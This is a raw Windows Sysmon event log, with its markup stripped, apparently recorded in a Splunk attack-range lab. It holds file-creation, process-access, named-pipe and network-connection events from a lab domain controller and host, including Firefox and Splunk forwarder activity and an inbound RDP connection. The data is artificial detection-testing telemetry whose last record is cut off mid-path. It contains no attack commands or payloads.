23542300x8000000000000000808423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:04.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95790824DD7BA9EC43360E06A88CEBAA,SHA256=C4F3FA7AF488753F982926C5EAA5F5CD2A0829D4F3928654FC7D7171ED1215F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=423FDA72D5CDCBF93B861DCC9857432B,SHA256=2DC4F186AFCA06993E88F2F8430466E20BB7A0FB66E755BBEE36A30096AB52B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.141{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B5E72A778217DAF240E862475033D9B1,SHA256=C7702984BB53EE8A203D308F9D19DEC496641AC4FE2DDA79A838488141B64938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.140{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6AED793FDBDBE09A70298BD1009B0027,SHA256=0D89947F51C053AD44657DCA96066C3183F216A0463CCD0E0F766E37999B024A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25E96984E39276257D75DE0288304F2F,SHA256=80F7B2DEAEBA6E0632926426243575DB49AE73C3A6F9A27FD9EAC104A3E7C670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:05.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3AE6B32D47D222F22908CADEAAE56AE,SHA256=821D4D3F5C2EC61CB35288FAEC737D33CA488E190D5977A5BC16115A88931A62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:57.752{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51094-false10.0.1.12-8000- 10341000x80000000000000001050863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.506{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x80000000000000001050862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.385{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x80000000000000001050861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.381{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x80000000000000001050860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.372{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.372{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.350{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.339{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.335{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.334{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5D1-60EB-727D-00000000CF01}7848C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9B482AEC466EADFBDC4B6826679B9A,SHA256=630269C9DCFF06C7E1B3A084239E9E8697118354F536E8FBB10F1CF835FB6BDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:06.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DED74DA82B00986D777348DB4F33DF0,SHA256=8778DC4B57CE4787A8F6630958BE6F67E15D556764E25708A208E5AFD20CA33A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.338{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62771B4469C1461EABE296C3054AB300,SHA256=F725542EF9CE63DA2EA76806E19812EEC78BBD4D68E64C7D8F8F4C3EF30C1DAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC98C076A4441C4F115F3BC1BE1D4895,SHA256=8FEB40F1F592A70703746963290A5C80FDED0EEBD4DE82C03F9E2D050F7105D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:05.193{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net46682-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:06.340{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99FB400CD1BC03EDDD44992DF72704C8,SHA256=872BB68EE2B8A2CB010F76C2A352848F926DE0A218D847A2B4613992C8B5BF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:06.340{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F85CABCAAF543E34A538337C738CA17,SHA256=882549E8A4E1C7D60625BE8A5E0DF7CC817A0B643F5055BE7CAC22EAE534345C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.318{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.284{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001050869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.280{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f78f|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001050868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:57:06.274{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.373.49070802C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001050867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:57:06.274{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.373.49070802C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001050866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.270{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001050865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:06.268{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 23542300x8000000000000000808429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:07.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E029131E59200E7B634339853B1EC4,SHA256=4A8ACCE606DC1F5C08CEB2C2A41DB173081F69768248AB433ED16E040EAB8ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:07.330{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A3082950E05E1324F650BE3F8060F2B,SHA256=E4811720F9BBA5B9950AD2EEE7CC4C0809DAF79839A3621EC191B4906D6588F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:08.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEAFD7EB14B39A5447707A08FEF72F65,SHA256=A324C74973EAFF72A1B57E35BF9E31710A2DB04935FB02CBD73CB0A6917AB4DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.861{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 